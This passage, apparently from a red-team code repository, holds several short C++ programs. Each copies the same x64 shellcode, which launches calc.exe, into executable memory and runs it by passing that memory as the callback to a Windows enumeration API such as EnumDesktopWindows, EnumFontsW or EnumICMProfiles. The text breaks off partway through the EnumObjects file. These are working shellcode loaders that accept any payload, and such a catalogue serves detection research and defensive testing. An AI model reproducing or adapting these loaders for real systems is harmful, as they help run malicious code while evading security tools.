"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 24 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 25 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 26 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 27 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 28 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 29 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 30 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 31 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 32 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 33 | "\x63\x2e\x65\x78\x65\x00"; 34 | 35 | 36 | 37 | int main() { 38 | 39 | 40 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 41 | ::RtlMoveMemory(addr, op, sizeof(op)); 42 | 43 | 44 | if (addr) 45 | ::EnumDesktopWindows(::GetThreadDesktop(::GetCurrentThreadId()), (WNDENUMPROC)addr, NULL); 46 | 47 | 48 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumDesktopWindows/EnumDesktopWindows.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumDirTreeW/EnumDirTreeW.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // requires Dbghelp.lib 5 | #include 6 | #pragma comment(lib, "Dbghelp.lib") 7 | 8 | // alfarom256 calc shellcode 9 | unsigned char op[] = 10 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 11 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 12 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 13 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 14 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 15 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 16 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 17 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 18 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 19 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 20 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 21 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 22 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 23 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 24 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 25 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 26 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 27 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 28 | "\x63\x2e\x65\x78\x65\x00"; 29 | 30 | int main() { 31 | 32 | 33 | LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 34 | memcpy(address, &op[0], sizeof(op)); 35 | 36 | ::SymInitialize(::GetCurrentProcess(), NULL, TRUE); 37 | 38 | WCHAR dummy[522]; 39 | ::EnumDirTreeW(::GetCurrentProcess(), L"C:\\Windows", L"*.log", dummy, (PENUMDIRTREE_CALLBACKW)address, NULL); 40 | 41 | 42 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumDirTreeW/EnumDirTreeW.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumDisplayMonitors/EnumDisplayMonitors.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | 5 | int err(const char* errmsg) { 6 | 7 | 8 | printf("Error: %s (%u)\n", errmsg, ::GetLastError()); 9 | return 1; 10 | 11 | } 12 | 13 | // alfarom256 calc shellcode 14 | unsigned char op[] = 15 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 16 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 17 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 18 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 19 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 20 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 21 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 22 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 23 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 24 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 25 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 26 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 27 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 28 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 29 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 30 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 31 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 32 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 33 | "\x63\x2e\x65\x78\x65\x00"; 34 | 35 | 36 | 37 | int main() { 38 | 39 | 40 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 41 | ::RtlMoveMemory(addr, op, sizeof(op)); 42 | 43 | ::EnumDisplayMonitors(NULL, NULL, (MONITORENUMPROC)addr, NULL); 44 | 45 | 46 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumDisplayMonitors/EnumDisplayMonitors.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumFontFamiliesExW/EnumFontFamiliesExW.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // alfarom256 calc shellcode 5 | unsigned char op[] = 6 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 7 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 8 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 9 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 10 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 11 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 12 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 13 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 14 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 15 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 16 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 17 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 18 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 19 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 20 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 21 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 22 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 23 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 24 | "\x63\x2e\x65\x78\x65\x00"; 25 | 26 | 27 | 28 | 29 | int main() { 30 | 31 | 32 | LPVOID address = VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 33 | memcpy(address, &op[0], sizeof(op)); 34 | 35 | 36 | LOGFONTW lf = { 0 }; 37 | lf.lfCharSet = DEFAULT_CHARSET; 38 | 39 | 40 | HDC dc = GetDC(NULL); 41 | EnumFontFamiliesExW(dc, &lf, (FONTENUMPROCW)address, NULL, NULL); 42 | 43 | return 0; 44 | 45 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumFontFamiliesExW/EnumFontFamiliesExW.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumFontFamiliesW/EnumFontFamiliesW.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // alfarom256 calc shellcode 5 | unsigned char op[] = 6 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 7 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 8 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 9 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 10 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 11 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 12 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 13 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 14 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 15 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 16 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 17 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 18 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 19 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 20 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 21 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 22 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 23 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 24 | "\x63\x2e\x65\x78\x65\x00"; 25 | 26 | 27 | 28 | 29 | int main() { 30 | 31 | 32 | LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 33 | memcpy(address, &op[0], sizeof(op)); 34 | 35 | 36 | HDC dc = GetDC(NULL); 37 | EnumFontFamiliesW(dc, NULL, (FONTENUMPROCW)address, NULL); 38 | 39 | return 0; 40 | 41 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumFontFamiliesW/EnumFontFamiliesW.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumFontsW/EnumFontsW.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | 4 | // alfarom256 calc shellcode 5 | unsigned char op[] = 6 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 7 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 8 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 9 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 10 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 11 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 12 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 13 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 14 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 15 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 16 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 17 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 18 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 19 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 20 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 21 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 22 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 23 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 24 | "\x63\x2e\x65\x78\x65\x00"; 25 | 26 | 27 | 28 | 29 | int main() { 30 | 31 | 32 | LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 33 | memcpy(address, &op[0], sizeof(op)); 34 | 35 | 36 | HDC dc = GetDC(NULL); 37 | EnumFontsW(dc, NULL, (FONTENUMPROCW)address, NULL); 38 | 39 | return 0; 40 | 41 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumFontsW/EnumFontsW.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumICMProfiles/EnumICMProfiles.cpp: -------------------------------------------------------------------------------- 1 | // EnumICMProfiles.cpp : This file contains the 'main' function. Program execution begins and ends there. 2 | // 3 | 4 | #include 5 | 6 | unsigned char op[] = 7 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 8 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 9 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 10 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 11 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 12 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 13 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 14 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 15 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 16 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 17 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 18 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 19 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 20 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 21 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 22 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 23 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 24 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 25 | "\x63\x2e\x65\x78\x65\x00"; 26 | 27 | 28 | 29 | int main() { 30 | 31 | 32 | LPVOID addr = VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 33 | ::RtlMoveMemory(addr, op, sizeof(op)); 34 | 35 | HDC dummy = GetDC(NULL); 36 | EnumICMProfilesW(dummy, (ICMENUMPROCW)addr, NULL); 37 | 38 | } 39 | 40 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumICMProfiles/EnumICMProfiles.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumLanguageGroupLocalesW/EnumLanguageGroupLocalesW.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | 5 | // alfarom256 calc shellcode 6 | unsigned char op[] = 7 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 8 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 9 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 10 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 11 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 12 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 13 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 14 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 15 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 16 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 17 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 18 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 19 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 20 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 21 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 22 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 23 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 24 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 25 | "\x63\x2e\x65\x78\x65\x00"; 26 | 27 | 28 | 29 | 30 | int main() { 31 | 32 | 33 | LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 34 | memcpy(address, &op[0], sizeof(op)); 35 | 36 | 37 | EnumLanguageGroupLocalesW((LANGGROUPLOCALE_ENUMPROCW)address, LGRPID_ARABIC, 0, 0); 38 | 39 | return 0; 40 | 41 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumLanguageGroupLocalesW/EnumLanguageGroupLocalesW.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumObjects/EnumObjects.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // alfarom256 calc shellcode 5 | unsigned char op[] = 6 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 7 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 8 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 9 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 10 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 11 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 12 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 13 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 14 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 15 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 16 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 17 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 18 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 19 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 20 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 21 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 22 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 23 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 24 | "\x63\x2e\x65\x78\x65\x00"; 25 | 26 | 27 | 28 | 29 | int main() { 30 | 31 | 32 | LPVOID address = VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 33 | memcpy(address, 